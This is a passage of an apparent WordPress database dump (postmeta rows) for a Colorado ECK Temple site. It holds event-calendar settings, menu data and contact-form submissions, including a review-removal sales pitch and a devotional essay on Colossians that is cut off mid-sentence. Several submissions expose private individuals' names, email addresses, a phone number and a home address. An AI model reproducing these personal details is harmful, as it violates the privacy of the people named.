(137572,264550,'passster_protection_type','password'),(137573,264550,'boldgrid_hide_page_title','0'),(137574,264550,'boldgrid_in_page_containers','1'),(137575,264550,'bgseo_robots_index','index'),(137576,264550,'bgseo_robots_follow','follow'),(137577,264553,'protect_children',''),(137578,264553,'passster_activate_global_protection',NULL),(137579,264553,'passster_activate_protection',NULL),(137580,264553,'passster_protection_type','password'),(137581,264553,'boldgrid_hide_page_title','0'),(137582,264553,'boldgrid_in_page_containers','1'),(137583,264553,'_menu_item_type','post_type'),(137584,264553,'_menu_item_menu_item_parent','0'),(137585,264553,'_menu_item_object_id','264550'),(137586,264553,'_menu_item_object','page'),(137587,264553,'_menu_item_target',''),(137588,264553,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(137589,264553,'_menu_item_xfn',''),(137590,264553,'_menu_item_url',''),(138080,264613,'_field_133','faye'),(143777,265165,'_field_34','834 Braun Court'),(143778,265165,'_field_35','Golden'),(143779,265165,'_field_36','CO'),(142874,265071,'_seq_num','4'),(143762,265164,'_field_30','kelly'),(143763,265164,'_field_31','walker'),(142873,265071,'_form_id','48'),(142872,265071,'_field_448','choll.03@comcast.net'),(142869,265071,'protect_children',''),(142870,265071,'_field_446','Joe'),(142871,265071,'_field_447','Smith'),(143775,265165,'_field_32','(720) 372-6063'),(143776,265165,'_field_33','hope.zubrin@gmail.com'),(137616,264588,'protect_children',''),(137617,264588,'mec_color',''),(137618,264588,'mec_location_id','118'),(137619,264588,'mec_dont_show_map','1'),(137620,264588,'mec_organizer_id','1'),(137621,264588,'mec_start_date','2021-11-07'),(137622,264588,'mec_start_time_hour','10'),(137623,264588,'mec_start_time_minutes','30'),(137624,264588,'mec_start_time_ampm','AM'),(137625,264588,'mec_start_day_seconds','37800'),(137626,264588,'mec_end_date','2021-11-07'),(137627,264588,'mec_end_time_hour','11'),(137628,264588,'mec_end_time_minutes','30'),(137629,264588,'mec_end_time_ampm','AM'),(137630,264588,'mec_end_day_seconds','41400'),(137631,264588,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-07\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-11-07\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(137632,264588,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(137633,264588,'mec_certain_weekdays','a:0:{}'),(137634,264588,'mec_allday','0'),(137635,264588,'mec_hide_time','0'),(137636,264588,'mec_hide_end_time','0'),(137637,264588,'mec_comment',''),(137638,264588,'mec_repeat_status','0'),(137639,264588,'mec_repeat_type',''),(137640,264588,'mec_repeat_interval','1'),(137641,264588,'mec_repeat_end',''),(137642,264588,'mec_repeat_end_at_occurrences',''),(137643,264588,'mec_repeat_end_at_date',''),(137644,264588,'mec_advanced_days','a:0:{}'),(137645,264588,'mec_in_days',''),(137646,264588,'mec_not_in_days',''),(137647,264588,'mec_hourly_schedules','a:0:{}'),(137648,264588,'mec_booking','a:0:{}'),(137649,264588,'mec_tickets','a:0:{}'),(137650,264588,'mec_fees_global_inheritance','1'),(137651,264588,'mec_fees','a:0:{}'),(137652,264588,'mec_ticket_variations_global_inheritance','1'),(137653,264588,'mec_ticket_variations','a:0:{}'),(137654,264588,'mec_reg_fields_global_inheritance','1'),(137655,264588,'mec_reg_fields','a:0:{}'),(137656,264588,'mec_op','a:0:{}'),(137657,264588,'mec_event_date_submit','20210422105713'),(137658,264588,'_edit_lock','1634603620:2'),(137659,264588,'_edit_last','2'),(151855,266081,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(137661,264588,'mec_read_more',''),(137662,264588,'mec_more_info',''),(137663,264588,'mec_more_info_title',''),(137664,264588,'mec_more_info_target','_self'),(137665,264588,'mec_cost',''),(137666,264588,'mec_currency','a:0:{}'),(137667,264588,'mec_additional_organizer_ids','a:0:{}'),(137668,264588,'mec_additional_location_ids','a:0:{}'),(137669,264588,'one_occurrence','0'),(137670,264588,'mec_timezone','global'),(137671,264588,'mec_countdown_method','global'),(137672,264588,'mec_public','1'),(137673,264588,'mec_bfixed_fields','a:0:{}'),(137674,264588,'mec_fields','a:0:{}'),(137675,264588,'mec_event_status','EventScheduled'),(137676,264588,'mec_moved_online_link',''),(137677,264588,'mec_cancelled_reason',''),(137678,264588,'mec_display_cancellation_reason_in_single_page',''),(143089,265095,'mec_dont_show_map','1'),(143088,265095,'mec_location_id','119'),(143087,265095,'mec_color',''),(143086,265095,'protect_children',''),(140305,264797,'_tribe_modified_fields','a:35:{s:16:\"protect_children\";i:1619714965;s:12:\"_EventOrigin\";i:1619714965;s:13:\"_thumbnail_id\";i:1619716231;s:24:\"boldgrid_hide_page_title\";i:1619714965;s:17:\"_EventShowMapLink\";i:1619714965;s:13:\"_EventShowMap\";i:1619714965;s:15:\"_EventStartDate\";i:1619716231;s:13:\"_EventEndDate\";i:1619716231;s:18:\"_EventStartDateUTC\";i:1619716231;s:16:\"_EventEndDateUTC\";i:1619716232;s:14:\"_EventDuration\";i:1619714965;s:20:\"_EventCurrencySymbol\";i:1619714965;s:22:\"_EventCurrencyPosition\";i:1619714965;s:10:\"_EventCost\";i:1619714965;s:9:\"_EventURL\";i:1619714965;s:14:\"_EventTimezone\";i:1619714965;s:18:\"_EventTimezoneAbbr\";i:1619714965;s:27:\"_EventNextPendingRecurrence\";i:1619714965;s:26:\"_RTECregistrationsDisabled\";i:1619714965;s:17:\"_RTECdeadlineType\";i:1619714965;s:19:\"_RTECwhoCanRegister\";i:1619714965;s:23:\"_RTEClimitRegistrations\";i:1619714965;s:21:\"_RTECmaxRegistrations\";i:1619714965;s:16:\"_EventRecurrence\";i:1619714965;s:18:\"_RTECnumRegistered\";i:1619714965;s:13:\"_EventVenueID\";i:1619714965;s:12:\"_dp_original\";i:1619714965;s:16:\"tribe_events_cat\";i:1619922109;s:10:\"_edit_last\";i:1619715086;s:10:\"post_title\";i:1619900270;s:12:\"post_content\";i:1619900509;s:11:\"post_status\";i:1619716231;s:35:\"passster_activate_global_protection\";i:1619900270;s:28:\"passster_activate_protection\";i:1619900270;s:24:\"passster_protection_type\";i:1619900270;}'),(192805,269146,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-06\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-06\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(143084,265094,'_seq_num','69'),(143085,265095,'protect_children',''),(143083,265094,'_form_id','13'),(192802,269146,'mec_currency','a:0:{}'),(192803,269146,'mec_additional_organizer_ids','a:0:{}'),(192804,269146,'mec_additional_location_ids','a:0:{}'),(192801,269146,'mec_cost',''),(192800,269146,'mec_more_info_target','_self'),(192799,269146,'mec_more_info_title',''),(192798,269146,'mec_more_info',''),(143082,265094,'_field_138','I noticed you have a bad review onECK Temple of Colorado ’s Google page fromSamual Leonard By reading this review I can tell that this isn’t your fault. The reason I’m reaching out is because my company, ReviewVio, can help remove this review and others permanently from your Google page. \nOur legal team negotiates with Google on your behalf to remove these negative reviews for as low as $97 per month. Our proprietary technology also prevents up to 90% of future negative reviews from occurring, helps generate new positive reviews and manages your review site listings all in one place. We’ve helped over 1,000 businesses across the U.S. remove over 3,000 negative reviews on Google, Facebook, Yelp and more. \nI would like to schedule a 15 minute call with you to see if we should remove this review. Do you have some time to chat today or tomorrow? \nHere’s a link to my calendar: 	\nhttps://calendly.com/reviewvio-consult-team/reviewvio-negative-review-consult-review-sc-clone Or, https://reviewvio.com/call7 \nRemember, a single negative review can drive away 22% of customers and three negative reviews can drive away a whopping 59% (Forbes). \nSincerely, \nAlexander Brown | Reviewvio - Remove, Prevent &amp; Capture \nOffice (949)-979-5490 \nal@reviewvioremovals.com | http://reviewvio.com/removal-landing \n9891 Irvine Center Drive, Suite #200, Irvine, CA 92618\n\n'),(143080,265094,'_field_135','al@reviewvioremovals.com'),(143081,265094,'_field_137','Remove Bad Google Review for '),(143079,265094,'_field_134','Brown'),(143078,265094,'_field_133','Alexander'),(140304,264797,'protect_children',''),(137763,264607,'_field_402','Christie'),(137764,264607,'_field_403','Holliday'),(137765,264607,'_field_404','choll.03@comcast.net'),(137766,264607,'_form_id','44'),(137767,264607,'_seq_num','1'),(137828,264608,'protect_children',''),(137829,264608,'mec_color',''),(137830,264608,'mec_location_id','122'),(137831,264608,'mec_dont_show_map','0'),(137832,264608,'mec_organizer_id','1'),(137833,264608,'mec_start_date','2021-08-08'),(137834,264608,'mec_start_time_hour','10'),(137835,264608,'mec_start_time_minutes','30'),(137836,264608,'mec_start_time_ampm','AM'),(137837,264608,'mec_start_day_seconds','37800'),(137838,264608,'mec_end_date','2021-08-08'),(137839,264608,'mec_end_time_hour','11'),(137840,264608,'mec_end_time_minutes','30'),(137841,264608,'mec_end_time_ampm','AM'),(137842,264608,'mec_end_day_seconds','41400'),(137843,264608,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-08-08\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-08-08\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(137844,264608,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(137845,264608,'mec_certain_weekdays','a:0:{}'),(137846,264608,'mec_allday','0'),(137847,264608,'mec_hide_time','0'),(137848,264608,'mec_hide_end_time','0'),(137849,264608,'mec_comment',''),(137850,264608,'mec_repeat_status','0'),(137851,264608,'mec_repeat_type',''),(137852,264608,'mec_repeat_interval','1'),(137853,264608,'mec_repeat_end',''),(137854,264608,'mec_repeat_end_at_occurrences',''),(137855,264608,'mec_repeat_end_at_date',''),(137856,264608,'mec_advanced_days','a:0:{}'),(137857,264608,'mec_in_days',''),(137858,264608,'mec_not_in_days',''),(137859,264608,'mec_hourly_schedules','a:0:{}'),(137860,264608,'mec_booking','a:0:{}'),(137861,264608,'mec_tickets','a:0:{}'),(137862,264608,'mec_fees_global_inheritance','1'),(137863,264608,'mec_fees','a:0:{}'),(137864,264608,'mec_ticket_variations_global_inheritance','1'),(137865,264608,'mec_ticket_variations','a:0:{}'),(137866,264608,'mec_reg_fields_global_inheritance','1'),(137867,264608,'mec_reg_fields','a:0:{}'),(137868,264608,'mec_op','a:0:{}'),(137869,264608,'mec_event_date_submit','20210422154949'),(137870,264608,'_edit_lock','1628091674:2'),(137871,264608,'_edit_last','2'),(137872,264608,'mec_read_more',''),(137873,264608,'mec_more_info',''),(137874,264608,'mec_more_info_title',''),(137875,264608,'mec_more_info_target','_self'),(137876,264608,'mec_cost',''),(137877,264608,'mec_currency','a:0:{}'),(137878,264608,'mec_additional_organizer_ids','a:0:{}'),(137879,264608,'mec_additional_location_ids','a:0:{}'),(137880,264608,'one_occurrence','0'),(137881,264608,'mec_timezone','global'),(137882,264608,'mec_countdown_method','global'),(137883,264608,'mec_public','1'),(137884,264608,'mec_bfixed_fields','a:0:{}'),(137885,264608,'mec_fields','a:0:{}'),(137886,264608,'mec_event_status','EventScheduled'),(137887,264608,'mec_moved_online_link',''),(137888,264608,'mec_cancelled_reason',''),(137889,264608,'mec_display_cancellation_reason_in_single_page',''),(137890,264608,'_thumbnail_id','265237'),(137891,264610,'protect_children',''),(137892,264610,'_edit_lock','1693507414:2'),(137893,264610,'_edit_last','2'),(137895,264610,'mec_color',''),(137896,264610,'mec_location_id','118'),(137897,264610,'mec_dont_show_map','0'),(137898,264610,'mec_organizer_id','1'),(137899,264610,'mec_read_more',''),(137900,264610,'mec_more_info',''),(137901,264610,'mec_more_info_title',''),(137902,264610,'mec_more_info_target','_self'),(137903,264610,'mec_cost',''),(137904,264610,'mec_currency','a:0:{}'),(137905,264610,'mec_additional_organizer_ids','a:0:{}'),(137906,264610,'mec_additional_location_ids','a:0:{}'),(137907,264610,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2022-05-17\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2022-05-17\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(137908,264610,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(137909,264610,'mec_certain_weekdays','a:0:{}'),(137910,264610,'mec_allday','0'),(137911,264610,'one_occurrence','0'),(137912,264610,'mec_hide_time','0'),(137913,264610,'mec_hide_end_time','0'),(137914,264610,'mec_comment',''),(137915,264610,'mec_timezone','global'),(137916,264610,'mec_countdown_method','global'),(137917,264610,'mec_public','1'),(137918,264610,'mec_start_date','2022-05-17'),(137919,264610,'mec_start_time_hour','10'),(137920,264610,'mec_start_time_minutes','30'),(137921,264610,'mec_start_time_ampm','AM'),(137922,264610,'mec_start_day_seconds','37800'),(137923,264610,'mec_end_date','2022-05-17'),(137924,264610,'mec_end_time_hour','10'),(137925,264610,'mec_end_time_minutes','30'),(137926,264610,'mec_end_time_ampm','AM'),(137927,264610,'mec_end_day_seconds','37800'),(137928,264610,'mec_repeat_status','0'),(137929,264610,'mec_repeat_type',''),(137930,264610,'mec_repeat_interval','1'),(137931,264610,'mec_repeat_end',''),(137932,264610,'mec_repeat_end_at_occurrences',''),(137933,264610,'mec_repeat_end_at_date',''),(137934,264610,'mec_advanced_days','a:0:{}'),(137935,264610,'mec_in_days',''),(137936,264610,'mec_not_in_days',''),(137937,264610,'mec_hourly_schedules','a:0:{}'),(137938,264610,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(137939,264610,'mec_tickets','a:0:{}'),(137940,264610,'mec_fees_global_inheritance','1'),(137941,264610,'mec_fees','a:0:{}'),(137942,264610,'mec_ticket_variations_global_inheritance','1'),(137943,264610,'mec_ticket_variations','a:0:{}'),(137944,264610,'mec_reg_fields_global_inheritance','1'),(137945,264610,'mec_reg_fields','a:0:{}'),(137946,264610,'mec_bfixed_fields','a:0:{}'),(137947,264610,'mec_op','a:0:{}'),(137948,264610,'mec_fields','a:0:{}'),(137949,264610,'mec_event_status','EventScheduled'),(137950,264610,'mec_moved_online_link',''),(137951,264610,'mec_cancelled_reason',''),(137952,264610,'mec_display_cancellation_reason_in_single_page',''),(137953,264610,'boldgrid_hide_page_title','0'),(137954,264611,'protect_children',''),(137955,264611,'_edit_lock','1619292227:2'),(137956,264611,'_edit_last','2'),(137958,264611,'mec_color',''),(137959,264611,'mec_location_id','118'),(137960,264611,'mec_dont_show_map','0'),(137961,264611,'mec_organizer_id','1'),(137962,264611,'mec_read_more',''),(137963,264611,'mec_more_info',''),(137964,264611,'mec_more_info_title',''),(137965,264611,'mec_more_info_target','_self'),(137966,264611,'mec_cost',''),(137967,264611,'mec_currency','a:0:{}'),(137968,264611,'mec_additional_organizer_ids','a:0:{}'),(137969,264611,'mec_additional_location_ids','a:0:{}'),(137970,264611,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-16\";s:4:\"hour\";s:1:\"9\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-16\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"15\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.3\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(137971,264611,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.3\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(137972,264611,'mec_certain_weekdays','a:0:{}'),(137973,264611,'mec_allday','0'),(137974,264611,'one_occurrence','0'),(137975,264611,'mec_hide_time','0'),(137976,264611,'mec_hide_end_time','0'),(137977,264611,'mec_comment',''),(137978,264611,'mec_timezone','global'),(137979,264611,'mec_countdown_method','global'),(137980,264611,'mec_public','1'),(137981,264611,'mec_start_date','2021-05-16'),(137982,264611,'mec_start_time_hour','9'),(137983,264611,'mec_start_time_minutes','0'),(137984,264611,'mec_start_time_ampm','AM'),(137985,264611,'mec_start_day_seconds','32400'),(137986,264611,'mec_end_date','2021-05-16'),(137987,264611,'mec_end_time_hour','10'),(137988,264611,'mec_end_time_minutes','15'),(137989,264611,'mec_end_time_ampm','PM'),(137990,264611,'mec_end_day_seconds','80100'),(137991,264611,'mec_repeat_status','1'),(137992,264611,'mec_repeat_type','advanced'),(137993,264611,'mec_repeat_interval','1'),(137994,264611,'mec_repeat_end','date'),(137995,264611,'mec_repeat_end_at_occurrences','9'),(137996,264611,'mec_repeat_end_at_date','2021-10-17'),(137997,264611,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.3\";}'),(137998,264611,'mec_in_days',''),(137999,264611,'mec_not_in_days',''),(138000,264611,'mec_hourly_schedules','a:0:{}'),(138001,264611,'mec_booking','a:0:{}'),(138002,264611,'mec_tickets','a:0:{}'),(138003,264611,'mec_fees_global_inheritance','1'),(138004,264611,'mec_fees','a:0:{}'),(138005,264611,'mec_ticket_variations_global_inheritance','1'),(138006,264611,'mec_ticket_variations','a:0:{}'),(138007,264611,'mec_reg_fields_global_inheritance','1'),(138008,264611,'mec_reg_fields','a:0:{}'),(138009,264611,'mec_bfixed_fields','a:0:{}'),(138010,264611,'mec_op','a:0:{}'),(138011,264611,'mec_fields','a:0:{}'),(138012,264611,'mec_event_status','EventScheduled'),(138013,264611,'mec_moved_online_link',''),(138014,264611,'mec_cancelled_reason',''),(138015,264611,'mec_display_cancellation_reason_in_single_page',''),(138016,264611,'boldgrid_hide_page_title','0'),(138017,264612,'protect_children',''),(138018,264612,'_edit_lock','1619287411:2'),(138019,264612,'_edit_last','2'),(138020,264612,'mec_color',''),(138021,264612,'mec_location_id','118'),(138022,264612,'mec_dont_show_map','0'),(138023,264612,'mec_organizer_id','1'),(138024,264612,'mec_read_more',''),(138025,264612,'mec_more_info',''),(138026,264612,'mec_more_info_title',''),(138027,264612,'mec_more_info_target','_self'),(138028,264612,'mec_cost',''),(138029,264612,'mec_currency','a:0:{}'),(138030,264612,'mec_additional_organizer_ids','a:0:{}'),(138031,264612,'mec_additional_location_ids','a:0:{}'),(138032,264612,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-02\";s:4:\"hour\";s:1:\"9\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-02\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"15\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/03/2021\";s:18:\"end_at_occurrences\";s:1:\"0\";}}'),(138033,264612,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/03/2021\";s:18:\"end_at_occurrences\";s:1:\"0\";}'),(138034,264612,'mec_certain_weekdays','a:0:{}'),(138035,264612,'mec_allday','0'),(138036,264612,'one_occurrence','0'),(138037,264612,'mec_hide_time','0'),(138038,264612,'mec_hide_end_time','0'),(138039,264612,'mec_comment',''),(138040,264612,'mec_timezone','global'),(138041,264612,'mec_countdown_method','global'),(138042,264612,'mec_public','1'),(138043,264612,'mec_start_date','2021-05-02'),(138044,264612,'mec_start_time_hour','9'),(138045,264612,'mec_start_time_minutes','0'),(138046,264612,'mec_start_time_ampm','AM'),(138047,264612,'mec_start_day_seconds','32400'),(138048,264612,'mec_end_date','2021-05-02'),(138049,264612,'mec_end_time_hour','10'),(138050,264612,'mec_end_time_minutes','15'),(138051,264612,'mec_end_time_ampm','AM'),(138052,264612,'mec_end_day_seconds','36900'),(138053,264612,'mec_repeat_status','1'),(138054,264612,'mec_repeat_type','advanced'),(138055,264612,'mec_repeat_interval','1'),(138056,264612,'mec_repeat_end','date'),(138057,264612,'mec_repeat_end_at_occurrences','-1'),(138058,264612,'mec_repeat_end_at_date','2021-10-03'),(138059,264612,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.1\";}'),(138060,264612,'mec_in_days',''),(138061,264612,'mec_not_in_days',''),(138062,264612,'mec_hourly_schedules','a:0:{}'),(138063,264612,'mec_booking','a:0:{}'),(138064,264612,'mec_tickets','a:0:{}'),(138065,264612,'mec_fees_global_inheritance','1'),(138066,264612,'mec_fees','a:0:{}'),(138067,264612,'mec_ticket_variations_global_inheritance','1'),(138068,264612,'mec_ticket_variations','a:0:{}'),(138069,264612,'mec_reg_fields_global_inheritance','1'),(138070,264612,'mec_reg_fields','a:0:{}'),(138071,264612,'mec_bfixed_fields','a:0:{}'),(138072,264612,'mec_op','a:0:{}'),(138073,264612,'mec_fields','a:0:{}'),(138074,264612,'mec_event_status','EventScheduled'),(138075,264612,'mec_moved_online_link',''),(138076,264612,'mec_cancelled_reason',''),(138077,264612,'mec_display_cancellation_reason_in_single_page',''),(138078,264612,'boldgrid_hide_page_title','0'),(151770,266078,'mec_reg_fields_global_inheritance','1'),(138082,264613,'_field_135','fa.bilia@apex.net'),(138083,264613,'_field_137','False Humility'),(138084,264613,'_field_138','False Humility\n\n\"Do not let anyone who delights in false humility and the worship of angels disqualify you for the prize. Such a person goes into great detail about what he has seen, and his unspiritual mind puffs him up with idle notions. He has lost connection with the Head, from whom the whole body, supported and held together by its ligaments and sinews, grows as God causes it to grow.\" (Colossians 2:18-19)\n\nThe key characteristics here are \"false humility and worship of angels.\" Those are two invariable elements of false teaching in this context. In Colossae there was an ancient teaching (later called \"gnosticism,\" meaning knowledge) which held that there is a hierarchy of angels between all human beings and God which must be placated and acknowledged, and that one\'s knowledge, which began in virtual ignorance, increased with such contact until at last one entered into the fullness of understanding of the Oneness of all things.\n\nThat ancient heresy appears widely today under the name of the New Age Movement. At the heart of it is this claim to seek the true Oneness of things. We are told that we are all part of the universe of created matter, and that we are united in Oneness with God. The claim is that this is the way to escape from being centered in oneself, and so move into the fullness of knowledge of the universe. That is why Paul refers to it here as a \"false humility.\" It claims to move you beyond self, but in actual practice, if you examine teachings like this, you discover that they focus on self; that the real goal is to develop all your self powers. That is why it is called the human potential movement---the idea that everything is already there inside of you, and all you need to do is bring it out and develop your possibilities and full potential. \n\nI saw a motto on a wall that said, \"The Light you seek is in your own lantern.\" That is the idea. You already have it all---now discover it. Numerous groups today offer to help in this: Esalen, Eckankar, est, Transpersonal Psychology, Transactional Analysis, etc. By the way, most of these are California groups, I must sadly admit. All of them are designed to help discover the great potential that is supposedly wrapped up in you. Whitney Houston sings, \"To love yourself is the greatest love there is.\" That is the heart of the human potential quest.\n\nAlong with this comes the idea of the \"worship of angels,\" as Paul describes it. That opens up the whole world of occult manifestations. Those of you who saw Shirley MacLaine\'s minidrama on television got a full dose of a world of strange spirit beings, of astrology, ouija boards, tarot cards and assorted holy men, psychics, swamis, yogis and gurus. All of these purport to offer help in increasing our understanding of who we are and what we can do, so as to fulfill the possibilities of our humanity.\n\nWhat is the danger of that? The apostle puts it very plainly: it \"disqualifies you for the prize.\" He has been referring to this \"prize\" all through this letter. It will eliminate you from the race, removing you from the possibility of experiencing \"Christ in you, the hope of glory.\" That is the great mystery which God himself has provided us, by which we have immediate and continual access to the fullness of deity in Christ, and by him, strength, help and comfort along our way. Such error will effectively remove all opportunity for the continued experience of love, joy and peace. \n\nIf you observe Shirley MacLaine and other advocates of the New Age Movement you will discover there is very little evidence that they derive real satisfaction from their experiences. Fascination, yes; satisfaction, no! They are forever seeking. They are never at rest. They are on a quest for a will-o\'-the-wisp, that seems to be further away from them the longer they pursue it. Such pursuit effectively removes one from experiencing the prize that God has in mind for his own: daily fellowship with a loving, living 